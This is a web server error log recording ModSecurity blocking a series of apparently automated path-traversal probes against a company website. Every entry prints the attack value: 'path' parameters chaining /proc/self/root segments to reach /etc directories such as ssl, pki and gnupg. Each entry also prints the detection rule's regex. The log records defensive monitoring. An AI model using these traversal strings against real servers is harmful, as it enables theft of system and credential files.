[Thu Mar 19 04:00:21.107127 2026] [:error] [pid 30077:tid 140411708356352] [client 74.7.243.128:45206] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufBfu8EFLIOrSqIptlPwAAAkQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:00:22.413988 2026] [:error] [pid 17653:tid 140411582465792] [client 74.7.243.128:45216] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufBsdf6f5d65gmYZQ65QAAAtM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:00:22.818794 2026] [:error] [pid 31803:tid 140411674785536] [client 74.7.241.31:44378] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufBuyqAr6etmhZHNortAAAAEg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:00:24.176833 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.241.31:44386] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufCNa6ubjKNq_cu4YG7AAAA0Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:00:24.799170 2026] [:error] [pid 17887:tid 140411582465792] [client 74.7.243.128:45226] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufCAkwaGbbGflqUZB7_wAAANM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:00:26.119036 2026] [:error] [pid 19093:tid 140411548894976] [client 74.7.243.128:45230] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufCl_V7PWP6ixUYl6DeAAAApc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:00:27.463148 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.243.128:45236] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufC9a6ubjKNq_cu4YG7QAAA00"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:00:29.659906 2026] [:error] [pid 14269:tid 140411616036608] [client 74.7.241.31:44400] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufDQbLMZ6AikZjR9Uk3QAAAA8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:00:30.956031 2026] [:error] [pid 27293:tid 140411691570944] [client 74.7.241.31:38224] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufDv-YZRR_7pZ7nDJU8QAAA8Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:00:33.388699 2026] [:error] [pid 17653:tid 140411716749056] [client 74.7.241.31:38230] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufEcdf6f5d65gmYZQ67gAAAsM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:00:34.548612 2026] [:error] [pid 15826:tid 140411590858496] [client 74.7.243.128:45238] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufEuoXxyEfFpUF8f_Y7wAAAVI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:00:35.851910 2026] [:error] [pid 19093:tid 140411624429312] [client 74.7.243.128:33796] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufE1_V7PWP6ixUYl6DfgAAAo4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:00:39.347064 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.243.128:33802] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufF8df6f5d65gmYZQ68QAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:00:40.546000 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.241.31:38234] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufGNa6ubjKNq_cu4YHAgAAA0o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:00:45.408258 2026] [:error] [pid 31803:tid 140411741927168] [client 74.7.243.128:38078] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufHeyqAr6etmhZHNorywAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:00:46.216116 2026] [:error] [pid 27403:tid 140411632822016] [client 74.7.241.31:53872] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufHhkFeYa1D6dYQnC0oQAAAc0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:00:47.717141 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.243.128:38090] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufH9a6ubjKNq_cu4YHFgAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:00:52.379958 2026] [:error] [pid 17887:tid 140411582465792] [client 74.7.243.128:38092] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufJAkwaGbbGflqUZB8EQAAANM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:00:53.663628 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.243.128:53044] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufJeoXxyEfFpUF8f_Y9wAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:00:54.981304 2026] [:error] [pid 14269:tid 140411624429312] [client 74.7.243.128:53058] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufJgbLMZ6AikZjR9Uk6gAAAA4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:00:58.539836 2026] [:error] [pid 27403:tid 140411582465792] [client 74.7.243.128:53064] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufKhkFeYa1D6dYQnC0qAAAAdM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
